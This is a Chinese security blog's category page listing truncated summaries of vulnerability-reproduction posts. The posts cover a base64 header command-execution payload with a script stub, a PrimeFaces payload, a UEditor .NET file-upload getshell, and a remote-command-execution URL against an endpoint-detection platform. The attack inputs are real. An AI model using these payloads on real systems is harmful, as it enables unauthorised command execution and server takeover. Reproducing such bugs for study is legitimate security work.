去B站咯

随笔分类 -  漏洞复现

摘要:Accept-Encoding: gzip,deflate Accept-Charset:c3lzdGVtKCd3aG9hbWknKTs= 地址 脚本如下: import base64,requests,queue,sys payload = "system('"+sys.argv[2]+"');" 阅读全文
posted @ 2020-12-11 16:25 不想长大a 阅读(218) 评论(0) 推荐(0)
摘要:exp payload pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC 阅读全文
posted @ 2020-11-25 15:10 不想长大a 阅读(1454) 评论(0) 推荐(0)
摘要:漏洞存在点: http://localhost/ueditor/net/controller.ashx?action=catchimage&encode=utf-8 漏洞原因:controller.ashx文件下只校验ContentType而没校验文件后缀导致getshell。 payload如下, 阅读全文
posted @ 2020-11-17 11:45 不想长大a 阅读(10254) 评论(0) 推荐(0)
摘要:先用fofa找到一个有漏洞的链接 body="终端检测响应平台" 漏洞利用 https://xxx.xxx.xx.xx/tool/log/c.php?strip_slashes=system&host=id 修改id值为执行的命令 使用whoami查询当前用户权限 使用pwd查询当前所在目录 查看当 阅读全文
posted @ 2020-09-30 14:53 不想长大a 阅读(610) 评论(0) 推荐(0)